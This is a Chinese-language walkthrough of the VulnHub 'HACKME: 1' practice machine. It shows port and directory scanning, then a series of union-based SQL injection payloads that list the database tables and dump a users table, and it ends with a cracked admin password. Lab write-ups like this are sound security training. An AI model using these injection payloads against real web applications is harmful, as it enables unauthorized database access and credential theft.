文章目录
HACKME: 1实战演练
一、前期准备
1、相关信息
靶机网站:https://www.vulnhub.com/entry/hackme-1,330/
设备名称 | IP地址 |
---|---|
靶机:HACKME: 1 | 192.168.2.52 |
攻击机:kali | 192.168.2.18 |
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.52
# 开放SSH:22端口,WEB:80端口
# SSH:22端口需要账号密码
2、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.2.52
3、访问网站
http://192.168.2.52/login.php
4、注册账号
http://192.168.2.52/register.php
# 用户名:kali 密码:123456
5、登录网站
http://192.168.2.52/login.php
6、搜索信息
http://192.168.2.52/welcome.php
三、Web漏洞攻击
1、SQL注入
# 验证是否存在SQL注入漏洞
OSCP' or 1=1#
# 显示回显位置
OSCP' union select 1,2,3#
# 显示数据库
OSCP' union select table_name,2,3 from information_schema.tables where
table_schema=database()#
# 显示字段名
OSCP' union select column_name,2,3 from information_schema.columns where table_name='users'#
# 显示字段值
OSCP' union select user,pasword,3 from users#
2、解密
# 账号:superadmin 密码:Uncrackable